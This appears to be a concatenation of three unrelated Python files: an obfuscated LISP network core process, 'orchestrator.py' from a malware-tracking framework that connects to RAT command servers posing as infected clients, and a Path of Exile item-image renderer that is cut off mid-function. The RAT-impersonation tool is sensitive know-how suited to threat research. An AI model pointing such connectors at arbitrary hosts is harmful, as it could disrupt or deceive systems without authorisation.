if ( OOOO . is_ipv4_string ( o0oi1I1I1I ) ) : o0oi1I1I1I = "::ffff:" + o0oi1I1I1I
OOOO . store_address ( o0oi1I1I1I )
if 52 - 52: I1Ii111 + I1Ii111
if 73 - 73: o0oOOo0O0Ooo . i11iIiiIii % OoooooooOO + ooOoO0o . OoooooooOO / OOooOOo
if 54 - 54: OoOoOO00 . OoooooooOO
if 36 - 36: oO0o / II111iiii * IiII % I1ii11iIi11i
lisp . lisp_send ( lisp_sockets , OOOO , o0o , ooOoOoo000O0O )
if 31 - 31: II111iiii + OOooOOo - OoooooooOO . I11i
return
if 28 - 28: Ii1I . I1ii11iIi11i
if 77 - 77: I1ii11iIi11i % II111iiii
if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
if 90 - 90: o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
if 32 - 32: IiII - ooOoO0o * iII111i * I11i
if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
def O0O0oOOo0O ( ) :
ii1111iII = open ( "./lisp.config.example" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
ii1111iII = open ( "./lisp.config" , "w" )
iiiiI = iiiiI . split ( "\n" )
for OOoO in iiiiI :
ii1111iII . write ( OOoO + "\n" )
if ( OOoO [ 0 ] == "#" and OOoO [ - 1 ] == "#" and len ( OOoO ) >= 4 ) :
o0oO = OOoO [ 1 : - 2 ]
ooOo0 = len ( o0oO ) * "-"
if ( o0oO == ooOo0 ) : break
if 61 - 61: II111iiii
if 48 - 48: OOooOOo
ii1111iII . close ( )
return
if 26 - 26: iII111i * I1Ii111 * oO0o * OoOoOO00
if 48 - 48: iII111i % i11iIiiIii . OoooooooOO * IiII % OoO0O00 . iII111i
if 6 - 6: O0 . ooOoO0o - oO0o / i11iIiiIii
if 84 - 84: I11i / I1ii11iIi11i * o0oOOo0O0Ooo * OoO0O00 * OOooOOo * O0
if 83 - 83: O0 % II111iiii + o0oOOo0O0Ooo / OoooooooOO
if 75 - 75: II111iiii . I1IiiI + OOooOOo - OoOoOO00 - O0 . I11i
if 19 - 19: Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
def Ii1i ( bottle_port ) :
global Oo0oO0ooo
global o00oOoo
global O0OOo
global II1Iiii1111i
global i1IIi11111i
global o000o0o00o0Oo
if 49 - 49: oO0o + oO0o + i11iIiiIii % iII111i
lisp . lisp_i_am ( "core" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "core-process starting up" )
lisp . lisp_uptime = lisp . lisp_get_timestamp ( )
lisp . lisp_version = commands . getoutput ( "cat lisp-version.txt" )
Oo0oO0ooo = commands . getoutput ( "cat lisp-build-date.txt" )
if 39 - 39: I11i / iII111i + i1IIi % OOooOOo
if 51 - 51: O0 % II111iiii % i11iIiiIii + OOooOOo . OoooooooOO
if 14 - 14: Oo0Ooo + i11iIiiIii - oO0o % IiII
if 1 - 1: oO0o + I1Ii111 . I1IiiI
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 47 - 47: iII111i . OoOoOO00
if 58 - 58: iII111i + Oo0Ooo / I1IiiI
if 68 - 68: IiII * Ii1I
if 91 - 91: Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
lisp . lisp_ipc_lock = multiprocessing . Lock ( )
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if ( os . path . exists ( "lisp.py" ) ) : lisp . lisp_version += "+"
if 83 - 83: ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
if 49 - 49: Ii1I + II111iiii / oO0o - OoOoOO00 % OoOoOO00 + I1IiiI
if 54 - 54: ooOoO0o % Oo0Ooo - OOooOOo
iIi11IiiiII11 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
if ( os . getenv ( "LISP_ANYCAST_MR" ) == None or lisp . lisp_myrlocs [ 0 ] == None ) :
o00oOoo = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
else :
iIi11IiiiII11 = lisp . lisp_myrlocs [ 0 ] . print_address_no_iid ( )
o00oOoo = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
if 26 - 26: iII111i / OoooooooOO - Oo0Ooo
lisp . lprint ( "Listen on {}, port 4342" . format ( iIi11IiiiII11 ) )
if 2 - 2: I1ii11iIi11i - Oo0Ooo
if 4 - 4: O0 / I11i . OoO0O00 - ooOoO0o / OOooOOo
if 25 - 25: I11i * OoOoOO00 - Oo0Ooo . ooOoO0o . oO0o
if 89 - 89: O0 * I11i * OoO0O00
if 3 - 3: OOooOOo / iII111i * iIii1I11I1II1 + II111iiii / o0oOOo0O0Ooo / IiII
if 25 - 25: OoOoOO00 + OoO0O00 % Ii1I % OOooOOo / oO0o
if ( lisp . lisp_external_data_plane ( ) == False ) :
o000o0o00o0Oo = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_DATA_PORT ) )
lisp . lprint ( "Listen on {}, port 4341" . format ( iIi11IiiiII11 ) )
if 91 - 91: OoO0O00 / OoO0O00 . II111iiii . ooOoO0o - I1IiiI
if 23 - 23: I1IiiI
if 7 - 7: iII111i % I1ii11iIi11i
if 64 - 64: I1Ii111 + i11iIiiIii
if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
if 68 - 68: IiII . ooOoO0o
O0OOo = lisp . lisp_open_send_socket ( "lisp-core" , "" )
O0OOo . settimeout ( 3 )
if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
II1Iiii1111i = lisp . lisp_open_listen_socket ( "" , "lisp-core-pkt" )
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
i1IIi11111i = [ o00oOoo , o00oOoo ,
O0OOo ]
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
threading . Thread ( target = oOoO ,
args = [ II1Iiii1111i , i1IIi11111i ] ) . start ( )
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
if 47 - 47: ooOoO0o - Ii1I
if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
if 1 - 1: OOooOOo
if 87 - 87: O0 * II111iiii + iIii1I11I1II1 % oO0o % i11iIiiIii - OoOoOO00
if ( os . path . exists ( "./lisp.config" ) == False ) :
lisp . lprint ( ( "./lisp.config does not exist, creating a copy " + "from lisp.config.example" ) )
if 73 - 73: iII111i + Ii1I
O0O0oOOo0O ( )
if 37 - 37: oO0o - iIii1I11I1II1 + II111iiii . Ii1I % iIii1I11I1II1
if 17 - 17: I1Ii111 + i1IIi % O0
if 65 - 65: IiII
if 50 - 50: II111iiii / OoO0O00
if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
if 95 - 95: oO0o
i11ii ( o00oOoo )
if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
threading . Thread ( target = lispconfig . lisp_config_process ,
args = [ O0OOo ] ) . start ( )
if 100 - 100: OoooooooOO - OoooooooOO + IiII
if 32 - 32: OoOoOO00 * o0oOOo0O0Ooo / OoooooooOO
if 90 - 90: I1Ii111
if 35 - 35: II111iiii / Ii1I
threading . Thread ( target = Oooo0Oo00o ,
args = [ bottle_port ] ) . start ( )
threading . Thread ( target = o0oO00OOo0oO , args = [ ] ) . start ( )
if 79 - 79: OoOoOO00 + I1Ii111 * iII111i * Ii1I
if 53 - 53: OOooOOo / Oo0Ooo
if 10 - 10: I1ii11iIi11i . o0oOOo0O0Ooo
if 75 - 75: O0 * i1IIi - I11i / OOooOOo % OOooOOo / OoOoOO00
threading . Thread ( target = oO0o000oOO ,
args = [ O0OOo ] ) . start ( )
if 5 - 5: O0 - iII111i / I1Ii111 . o0oOOo0O0Ooo
if 7 - 7: I1ii11iIi11i - OoOoOO00
if 54 - 54: oO0o / iIii1I11I1II1 / OoooooooOO . i1IIi - OoOoOO00
if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
threading . Thread ( target = o0O0OOOo0 ) . start ( )
return ( True )
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
if 45 - 45: OoOoOO00 * ooOoO0o / OoooooooOO + OoO0O00 . I1Ii111 / OoO0O00
if 64 - 64: Ii1I / i1IIi % I1IiiI - o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i - OoooooooOO
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
def I1iiII1 ( ) :
if 45 - 45: OoO0O00 + OoO0O00 % ooOoO0o
if 36 - 36: Ii1I * I11i . I11i / Oo0Ooo / I1IiiI
if 80 - 80: OoooooooOO - i1IIi
if 51 - 51: i1IIi . OoOoOO00 / OoOoOO00 % i11iIiiIii * OOooOOo - I1Ii111
lisp . lisp_close_socket ( O0OOo , "lisp-core" )
lisp . lisp_close_socket ( II1Iiii1111i , "lisp-core-pkt" )
lisp . lisp_close_socket ( o00oOoo , "" )
lisp . lisp_close_socket ( o000o0o00o0Oo , "" )
return
if 49 - 49: Oo0Ooo - iIii1I11I1II1
if 64 - 64: I1Ii111 + iIii1I11I1II1
if 14 - 14: Ii1I / OoooooooOO + II111iiii . O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
if 12 - 12: OoOoOO00 + o0oOOo0O0Ooo . I1Ii111
if 52 - 52: OoO0O00
if 4 - 4: Ii1I % I1ii11iIi11i + I11i - I1ii11iIi11i
if 98 - 98: Ii1I - O0 * oO0o * Ii1I * Ii1I
if 44 - 44: IiII + I11i
if 66 - 66: oO0o
if 34 - 34: iII111i % i11iIiiIii + i11iIiiIii - iII111i
def i11ii ( lisp_socket ) :
if 2 - 2: II111iiii + i1IIi
ii1111iII = open ( "./lisp.config" , "r" ) ; iiiiI = ii1111iII . read ( ) ; ii1111iII . close ( )
iiiiI = iiiiI . split ( "\n" )
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
II11II = False
for OOoO in iiiiI :
if ( OOoO [ 0 : 1 ] == "#-" and OOoO [ - 2 : - 1 ] == "-#" ) : break
if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
if ( OOoO . find ( "decentralized-push-xtr = yes" ) == - 1 ) : continue
II11II = True
break
if 40 - 40: iII111i + O0
if ( II11II == False ) : return
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
Ii1 = [ ]
o0OOOoo0000 = False
for OOoO in iiiiI :
if ( OOoO [ 0 : 1 ] == "#-" and OOoO [ - 2 : - 1 ] == "-#" ) : break
if ( OOoO == "" or OOoO [ 0 ] == "#" ) : continue
if 19 - 19: OoooooooOO . I1IiiI + I1Ii111 - I1IiiI / I1IiiI % IiII
if ( OOoO . find ( "lisp map-server" ) != - 1 ) :
o0OOOoo0000 = True
continue
if 4 - 4: i11iIiiIii * I1ii11iIi11i + OoooooooOO - IiII . ooOoO0o . iIii1I11I1II1
if ( OOoO [ 0 ] == "}" ) :
o0OOOoo0000 = False
continue
if 48 - 48: o0oOOo0O0Ooo * oO0o . I1IiiI - I1Ii111 + OOooOOo . Oo0Ooo
if 62 - 62: I11i + OoooooooOO * iIii1I11I1II1 / i1IIi * O0
if 10 - 10: iIii1I11I1II1 * OoooooooOO / OOooOOo
if 33 - 33: o0oOOo0O0Ooo % IiII - iIii1I11I1II1 % OOooOOo + I1Ii111 - i11iIiiIii
if 91 - 91: OoooooooOO . iIii1I11I1II1 / i11iIiiIii
if ( o0OOOoo0000 and OOoO . find ( "address = " ) != - 1 ) :
oOOOO = OOoO . split ( "address = " ) [ 1 ]
OoOOoo0 = int ( oOOOO . split ( "." ) [ 0 ] )
if ( OoOOoo0 >= 224 and OoOOoo0 < 240 ) : Ii1 . append ( oOOOO )
if 93 - 93: II111iiii * OoOoOO00 % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o - i1IIi . OoOoOO00
if ( oOOOO == [ ] ) : return
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
iIi = commands . getoutput ( 'ifconfig eth0 | egrep "inet "' )
if ( iIi == "" ) : return
oO0o00o000Oo0 = iIi . split ( ) [ 1 ]
if 1 - 1: I1IiiI - I1Ii111
if 62 - 62: OoO0O00 . iII111i . iII111i % i1IIi * oO0o % Oo0Ooo
if 20 - 20: ooOoO0o . IiII / I11i . OoooooooOO * OOooOOo + Ii1I
if 2 - 2: I1IiiI
Ii111iIi1iIi = socket . inet_aton ( oO0o00o000Oo0 )
for oOOOO in Ii1 :
lisp_socket . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_IF , Ii111iIi1iIi )
IIii1Ii = socket . inet_aton ( oOOOO ) + Ii111iIi1iIi
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_ADD_MEMBERSHIP , IIii1Ii )
lisp . lprint ( "Setting multicast listen socket for group {}" . format ( oOOOO ) )
if 98 - 98: II111iiii + Oo0Ooo * iIii1I11I1II1 * I1ii11iIi11i + OOooOOo * Ii1I
if 76 - 76: ooOoO0o . oO0o
return
if 60 - 60: OOooOOo * ooOoO0o * OoO0O00
if 64 - 64: I11i / II111iiii / OoO0O00 - ooOoO0o * iIii1I11I1II1 . iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
III1I11II11I = int ( sys . argv [ 1 ] ) if ( len ( sys . argv ) > 1 ) else 8080
if 78 - 78: I1ii11iIi11i . I1Ii111 . I1Ii111 . I11i % iII111i
if 26 - 26: ooOoO0o + OoO0O00 / OoOoOO00 . II111iiii * Ii1I
if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if ( Ii1i ( III1I11II11I ) == False ) :
lisp . lprint ( "lisp_core_startup() failed" )
lisp . lisp_print_banner ( "lisp-core abnormal exit" )
exit ( 1 )
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
while ( True ) :
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
if 22 - 22: i1IIi
if 3 - 3: OoO0O00 * I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
O0OOO , II11iIiIIIiI , o0o , ooOoOoo000O0O = lisp . lisp_receive ( o00oOoo , False )
if 96 - 96: IiII
if ( II11iIiIIIiI == "" ) : break
if 99 - 99: iIii1I11I1II1 - ooOoO0o
if 79 - 79: I1IiiI + oO0o % I11i % oO0o
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
II11iIiIIIiI = lisp . lisp_convert_6to4 ( II11iIiIIIiI )
O0O00O0Oo0 ( i1IIi11111i , II11iIiIIIiI , o0o , ooOoOoo000O0O )
if 99 - 99: o0oOOo0O0Ooo + OOooOOo
if 34 - 34: I1Ii111 * o0oOOo0O0Ooo . I1IiiI % i11iIiiIii
I1iiII1 ( )
lisp . lisp_print_banner ( "lisp-core normal exit" )
exit ( 0 )
if 61 - 61: iIii1I11I1II1 + oO0o * I11i - i1IIi % oO0o
if 76 - 76: oO0o / OoOoOO00
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
orchestrator.py | #!/usr/bin/env python3
import argparse
import yaml
import importlib
import threading
import time
import random
from puppet_rat import PuppetRAT
from typing import List, Tuple
def import_puppet_rat(full_name: str) -> PuppetRAT:
module_name, class_name = full_name.rsplit('.', 1)
module = importlib.import_module(module_name)
if not module:
raise ModuleNotFoundError(module_name)
return getattr(module, class_name)
def connect(target_ip: str, target_port: int, plugin_name: str) -> None:
thread = threading.Thread(target=_connect, args=(target_ip, target_port, plugin_name))
thread.start()
def _connect(target_ip: str, target_port: int, plugin_name: str) -> None:
rat_server = import_puppet_rat(plugin_name)
server = rat_server(target_ip, target_port)
while True:
try:
server.connect()
server.register()
server.loop()
except:
server.logger.exception('')
time.sleep(random.randint(1, 30))
def connect_targets(targets: List[Tuple[str, Tuple[str, int, str]]]) -> None:
for target_name, target in targets:
print(f'[*] Connecting {target_name}...')
connect(target['ip'], target['port'], target['plugin'])
def main():
parser = argparse.ArgumentParser(description="=== [M]aster[O]f[P]uppets ===\r\nhttps://http://github.com/intezer/mop\r\nAdavnced Malware Tracking Framework",
formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog, width=1024))
parser.add_argument('--target-ip', dest='target_ip', type=str, default=None, help='Target ip address to connect')
parser.add_argument('--target-port', dest='target_port', type=int, default=None, help='Target port to connect')
parser.add_argument('--plugin-name', dest='plugin_name', type=str, default=None,
help='Plugin to use, please specify full name(for example "plugins.njrat.NjRAT")')
parser.add_argument('--targets-config', dest='targets_config', type=str, default=None, help='Config file with multiple targets')
args = parser.parse_args()
if args.target_ip:
connect(args.target_ip, args.target_port, args.plugin_name)
elif args.targets_config:
with open(args.targets_config) as fh:
config = yaml.load(fh, Loader=yaml.FullLoader)
connect_targets(config['targets'].items())
else:
parser.error('No action requested, add --target-ip or --targets-config')
if __name__=='__main__':
main()
|
utils.py | import binascii
import html
import json as js
import math
import os
import re
import threading
import unicodedata
import xml.etree.cElementTree as Etree
from collections import defaultdict
from collections import namedtuple
from io import BytesIO
from queue import Queue
import urllib3
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
from bs4 import BeautifulSoup as Soup
from poe.exceptions import AbsentItemBaseException
from poe.exceptions import OutdatedPoBException, RequestException
from poe.models import Weapon, Armour, PassiveSkill, Gem
from poe.price import ItemPriceQuery, CurrencyQuery
from .constants import *
re_range = re.compile(r'\(.+?\)')
# Simple cursor class that lets me handle moving around the image quite well
# also get around the hassle of maintaining position and adding and subtracting.
def strip_unicode(text: str):
return ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))
class Cursor:
def __init__(self, x_start):
self.x = 0
self.y = 0
self.x_start = x_start
# Return current pos of cursor
@property
def pos(self):
return self.x, self.y
def move_x(self, quantity):
self.x += quantity
def move_y(self, quantity):
self.y += quantity
def reset_x(self):
self.x = self.x_start
# Cause relative paths are ass
_dir = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'data')
# Find links wrapped in [[]] returned by Gamepedia
reg = re.compile(r'\[\[[^\]]+\]\]')
try:
with open(f"{_dir}/keystones.json") as f:
keystones = js.load(f)
with open(f"{_dir}/ascendancy.json") as f:
asc_nodes = js.load(f)
with open(f"{_dir}/items.json") as f:
items = js.load(f)
except Exception:
pass
def unescape_to_list(props, ret_matches=False):
matches = reg.findall(props)
has_table = Soup(html.unescape(props)).select_one('table.mw-collapsed tr')
if not has_table:
for match in set(matches):
if '|' in match:
props = props.replace(match, match.split('|')[1].strip(']]'))
else:
props = props.replace(match, match.strip('[[]]'))
prop_list = html.unescape(props).replace('<br />', '<br>').split('<br>')
prop_list = [x.replace('<em class="tc -corrupted">', '').replace('</em>', '') for x in prop_list]
else:
# FIXME: non-iterable object
prop_list = [x.text for x in has_table]
if ret_matches:
return prop_list, matches
return prop_list
class ItemRender:
def __init__(self, flavor):
self.flavor = flavor.lower()
self.font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 15)
self.lore_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCapsItalic.ttf', 15)
self.header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
self.namebar_left = Image.open(f'{_dir}//{self.flavor}_namebar_left.png').convert('RGBA')
self.namebar_right = Image.open(f'{_dir}//{self.flavor}_namebar_right.png').convert('RGBA')
self.namebar_trans = Image.open(f'{_dir}//{self.flavor}_namebar_trans.png').convert('RGBA')
self.separator = Image.open(f'{_dir}//{self.flavor}_separator.png').convert('RGBA')
self.div_frame = Image.open(f'{_dir}//div_frame.png').convert('RGBA')
self.elder_badge = Image.open(f'{_dir}//elder_badge.png').convert('RGBA')
self.shaper_badge = Image.open(f'{_dir}//shaper_badge.png').convert('RGBA')
self.redeemer_badge = Image.open(f'{_dir}//redeemer_badge.png').convert('RGBA')
self.crusader_badge = Image.open(f'{_dir}//crusader_badge.png').convert('RGBA')
self.hunter_badge = Image.open(f'{_dir}//hunter_badge.png').convert('RGBA')
self.warlord_badge = Image.open(f'{_dir}//warlord_badge.png').convert('RGBA')
self.passive_frame = Image.open(f'{_dir}//passive_frame.png').convert('RGBA')
self.keystone_frame = Image.open(f'{_dir}//keystone_frame.png').convert('RGBA')
self.notable_frame = Image.open(f'{_dir}//notable_frame.png').convert('RGBA')
self.ascendancy_frame = Image.open(f'{_dir}//ascendancy_frame.png').convert('RGBA')
self.shaper_backgrounds = {
('1', '1'): Image.open(f'{_dir}//shaper_bg_1x1.png').convert('RGBA'),
('1', '2'): Image.open(f'{_dir}//shaper_bg_1x2.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//shaper_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//shaper_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//shaper_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//shaper_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//shaper_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//shaper_bg_2x4.png').convert('RGBA'),
}
self.elder_backgrounds = {
('1', '1'): Image.open(f'{_dir}//elder_bg_1x1.png').convert('RGBA'),
('1', '3'): Image.open(f'{_dir}//elder_bg_1x3.png').convert('RGBA'),
('1', '4'): Image.open(f'{_dir}//elder_bg_1x4.png').convert('RGBA'),
('2', '1'): Image.open(f'{_dir}//elder_bg_2x1.png').convert('RGBA'),
('2', '2'): Image.open(f'{_dir}//elder_bg_2x2.png').convert('RGBA'),
('2', '3'): Image.open(f'{_dir}//elder_bg_2x3.png').convert('RGBA'),
('2', '4'): Image.open(f'{_dir}//elder_bg_2x4.png').convert('RGBA'),
}
# A namedtuple to handle properties.
# This works fairly well except for Separators which is kinda hacky
self.prop = namedtuple('Property', ['title', 'text', 'color'])
# I don't know why PIL does this, but spacing with fonts is not consistent,
# this means I have to compensate by spacing more after separators and stuff
self.last_action = str()
# Go through our total properties and image to get the image/box size
# I feel the code is a bit redundant considering I have two instances
# of an if-fest, calc_size and sort_stats.
# TODO: reduce redundancy
def calc_size(self, stats, header):
width = self.header_font.getsize(header)[0] + (self.namebar_left.size[0] * 2) + 4
height = 0
last_sep = False
for stat in stats:
if stat.title == "Separator":
height += SEPARATOR_HEIGHT + SEPARATOR_SPACING
last_sep = True
continue
elif stat.title == "Elemental Damage:":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
last_sep = False
elif stat.title == "Requires":
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = stat.title
for attr in stat.text.keys():
stat_text += f" {attr.title()} {stat.text[attr]}{'' if list(stat.text.keys())[-1] == attr else ','}"
last_sep = False
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
ht = LINE_SPACING
for line in stat.text:
w = self.lore_font.getsize(line)
ht += STAT_HEIGHT
if w[0] > width:
width = w[0]
height += ht + STAT_SPACING
else:
w = self.lore_font.getsize(stat.text)
if w[0] > width:
width = w[0]
height += STAT_HEIGHT
last_sep = False
continue
elif stat.title == "Image":
height += stat.text.size[1] + IMAGE_PADDING
last_sep = False
else:
if last_sep:
height += SEPARATOR_SPACING
else:
height += STAT_SPACING
height += STAT_HEIGHT
stat_text = f"{stat.title}{stat.text}"
last_sep = False
if stat.title != "Image":
# FIXME: referenced before assignment
w = self.font.getsize(stat_text)
else:
w = stat.text.size
if w[0] > width:
width = w[0]
# 34 is the 17px padding from both sides
return width + 34, height + self.namebar_trans.size[1] + 25
def sort_stats(self, item):
stats = list()
separator = self.prop("Separator", None, None)
if not isinstance(item, PassiveSkill):
if 'weapon' in item.tags:
stats.append(self.prop(item.item_class, '', DESC_COLOR))
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.physical_damage:
stats.append(self.prop("Physical Damage: ", item.physical_damage, PROP_COLOR))
elements = {
element.split('_')[0]: getattr(item, element) for element in [
'fire_damage', 'cold_damage', 'lightning_damage'
] if getattr(item, element)
}
if elements:
stats.append(self.prop("Elemental Damage:", elements, None))
if item.chaos_damage:
stats.append(self.prop("Chaos Damage: ", item.chaos_damage, CHAOS_COLOR))
if item.critical_chance:
stats.append(self.prop("Critical Strike Chance: ", item.critical_chance, None))
if item.attack_speed:
stats.append(self.prop("Attacks Per Second: ", item.attack_speed, PROP_COLOR))
if int(item.range):
stats.append(self.prop("Weapon Range: ", item.range, None))
stats.append(separator)
elif 'armour' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
if item.block:
stats.append(self.prop("Chance To Block: ", f"{item.block}%", PROP_COLOR))
if item.armour:
stats.append(self.prop("Armour: ", item.armour, PROP_COLOR))
if item.evasion:
stats.append(self.prop("Evasion: ", item.evasion, PROP_COLOR))
if item.energy_shield:
stats.append(self.prop("Energy Shield: ", item.energy_shield, PROP_COLOR))
stats.append(separator)
elif 'ring' in item.tags or 'amulet' in item.tags or 'belt' in item.tags:
if item.quality:
stats.append(self.prop("Quality: ", f"+{item.quality}%", PROP_COLOR))
stats.append(separator)
elif 'gem' in item.tags:
stats.append(self.prop(item.gem_tags.replace(',', ', '), '', DESC_COLOR))
# Temp disable for bugged skill_levels table
if item.stats_per_level[0]['mana multiplier']:
stats.append(self.prop("Mana Multiplier: ", f"{item.stats_per_level[0]['mana multiplier']}%", None))
if item.radius:
stats.append(self.prop("Radius: ", item.radius, None))
if not item.is_aura:
# Enlighten Enhance etc only go up to 10
try:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[20]['mana cost']})", PROP_COLOR)
)
except KeyError:
stats.append(self.prop(
"Mana Cost: ", f"({item.stats_per_level[1]['mana cost']}-{item.stats_per_level[10]['mana cost']})", PROP_COLOR)
)
else:
stats.append(self.prop("Mana Reserved: ", f"{item.stats_per_level[0]['mana cost']}%", None))
# Enlighten Enhance etc only go up to 10
try:
if item.stats_per_level[20]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[20]['stored uses']}, None))
except KeyError:
if item.stats_per_level[10]['stored uses']:
stats.append(self.prop("Stored Uses", {item.stats_per_level[10]['stored uses']}, None))
if item.stats_per_level[0]['cooldown']:
stats.append(self.prop("Cooldown Time: ", f"{item.stats_per_level[0]['cooldown']} sec", None))
if item.cast_time:
stats.append(self.prop("Cast Time: ", f"{item.cast_time} sec", None))
if item.stats_per_level[0]['critical strike chance']:
stats.append(
self.prop("Critical Strike Chance: ", f"{item.stats_per_level[0]['critical strike chance']}%", None)
)
if item.stats_per_level[0]['damage effectiveness']:
stats.append(
